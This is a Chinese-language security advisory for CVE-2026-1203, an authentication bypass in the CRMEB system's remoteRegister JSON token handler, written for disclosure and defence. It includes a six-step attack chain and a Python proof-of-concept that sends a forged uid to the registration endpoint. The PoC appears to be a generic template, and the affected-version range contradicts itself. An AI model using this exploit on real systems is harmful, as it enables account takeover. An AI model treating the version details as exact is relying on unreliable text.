CVE-2026-1203 CRMEB JSON Token认证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-1203

漏洞类型

认证绕过

CVSS评分

5.6 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CRMEB

漏洞概述

CVE-2026-1203是CRMEB系统中存在的一个认证绕过漏洞。该漏洞存在于CRMEB至5.6.3版本中，影响组件为JSON Token Handler中的remoteRegister函数。攻击者可以通过操控uid参数来绕过正常的身份验证流程，成功获取未经授权的访问权限。漏洞被评定为中等严重程度（CVSS 5.6），攻击复杂度较高但具有远程利用的可能性。由于该漏洞的利用代码已公开，攻击者可能在无需用户交互的情况下发起攻击，对系统安全造成威胁。建议受影响用户尽快升级到最新版本或采取临时缓解措施。

技术细节

该漏洞存在于CRMEB的LoginServices.php文件中的remoteRegister函数。问题出在JSON Token处理逻辑中，当处理用户注册或认证请求时，程序未能正确验证uid参数的合法性。攻击者可以通过构造恶意的uid值来绕过身份验证检查。具体来说，由于函数对uid参数缺乏足够的校验，攻击者可以使用任意uid值注册或登录账户，从而实现冒充其他用户或获取未授权访问权限。攻击者通过网络远程发起请求，利用JSON Token Handler的缺陷完成认证绕过。由于攻击复杂度较高，需要攻击者具备一定的技术能力来构造有效的攻击载荷。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用CRMEB系统，并确定其版本号 <= 5.6.3

STEP 2

步骤2

漏洞探测：访问/api/user/remoteRegister接口，确认JSON Token Handler组件存在

STEP 3

步骤3

构造攻击载荷：构造包含恶意uid参数的JSON请求，尝试绕过正常认证流程

STEP 4

步骤4

发送恶意请求：向目标服务器发送构造的POST请求，携带被篡改的uid值

STEP 5

步骤5

获取未授权访问：成功绕过认证后，攻击者获取有效token或直接访问目标用户账户

STEP 6

步骤6

权限滥用：利用获取的权限执行后续恶意操作，如数据窃取、账户接管等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2026-1203 PoC - CRMEB Authentication Bypass
# Target: CRMEB <= 5.6.3
# Component: crmeb/app/services/user/LoginServices.php
# Function: remoteRegister

target_url = "http://target.com/api/user/remoteRegister"

# Construct malicious payload with manipulated uid parameter
payload = {
    "uid": "1",  # Manipulated uid to bypass authentication
    "username": "attacker",
    "password": "password123",
    "phone": "13800138000"
}

headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    
    if response.status_code == 200:
        data = response.json()
        print(f"[+] Response: {json.dumps(data, indent=2)}")
        
        # Check if token is returned (authentication bypass successful)
        if "token" in data or "data" in data:
            print("[+] Authentication bypass potentially successful!")
            print(f"[+] Received token/data: {data}")
    else:
        print(f"[-] Request failed with status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

CRMEB < 5.6.3

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 限制/api/user/remoteRegister接口的访问来源，仅允许受信任的IP访问；2) 部署Web应用防火墙(WAF)规则，检测和阻止异常的uid参数值；3) 临时禁用remoteRegister功能或添加额外的二次验证机制；4) 加强服务器端的安全监控，及时发现异常认证行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1203
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1203
3 Details https://www.cvedetails.com/cve/CVE-2026-1203/
4 VulDB https://vuldb.com/cve/CVE-2026-1203
5 Link https://github.com/foeCat/CVE/blob/main/CRMEB/jwt_auth_bypass/remote_register_jwt_bypass.md
6 Link https://vuldb.com/?ctiid.341789
7 Link https://vuldb.com/?id.341789
8 Link https://vuldb.com/?submit.735349